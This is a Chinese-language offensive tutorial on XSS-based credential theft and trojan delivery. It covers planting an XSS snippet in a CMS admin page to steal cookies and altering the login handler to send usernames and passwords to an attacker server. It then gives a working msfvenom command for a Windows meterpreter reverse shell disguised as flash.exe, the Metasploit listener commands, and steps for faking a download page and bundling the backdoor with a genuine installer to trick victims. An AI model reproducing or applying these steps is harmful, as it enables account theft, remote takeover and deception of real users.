XSS-后台植入Cookie&表单劫持
思路:
因为cookie有可能会有过滤情况导致获取不全,那么就可以使用获取表单密码的方法,同时解决劫持密码但检测或解密不出来的一种思路同时保证权限维持
表单密码(白盒):查看登录界面,在登陆页面处填写代码获取账户密码并通过js代码发送到指定位置,在目的服务器处编写接受文件即可
这是一个本地登录页面的CMS,当登录成功后会跳转到index页面
直接利用xss平台获取代码,将代码放到index页面的首部,那么在登陆成功后访问index页面就会执行该代码,在xss平台上就会获取cookie
代码仔细对比XSS平台获取的cookie和页面登录的cookie发现会有不同,多了一个sessid的值,那么这里就用一个新方法--表单劫持。
可以发现登录后会访问一个叫login_check.php的页面,那么查看页面,简单的分析了一下代码,在指定为添加SQL语句,让登录的账号和密码直接发送到指定的IP地址出。
在服务器出简单的写一个接受代码并写入到myfile文件中。
当用户登录后,账号和密码传递到服务器上,服务器接受并写入文件,直接查看文件的代码即可。
XSS-Flash钓鱼配合MSF捆绑上线
-条件:beef上线受控后或直接钓鱼(受害者爱看SESE)
1、生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=6666 -f exe > flash.exe
2、下载官方文件-保证安装正常
3、压缩捆绑文件-解压提取运行
4、MSF配置监听状态
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run
5、诱使受害者访问URL-语言要适当
思路:建立一个伪造的下载连接,然后后门脚本和软件同时压缩,诱导目标去下载安装,在服务器上进行监听,获取权限。
伪造一个下载文件的页面,域名和页面尽量与真文件页面相似。
用户访问页面通常是为了下载文件,所以可以将立即下载的地址改为后门代码下载的地址,但用户点击后就会执行代码的下载,进行也包含真正的文件,以防目标用户发现没有想要的文件起疑心。
利用kali生成后门脚本,并将正确的文件与后门脚本一起压缩
注意:尽量设置解压缩后先运行后门代码再运行脚本
简单的修改一下图标,为了显得更加真实
修改下载地址,并在服务器上进行监听。诱惑对方点击你所发送的连接并进行下载,或者利用beef进行跳转。当解压缩后并安装软件后,服务器上就可以直接获取权限。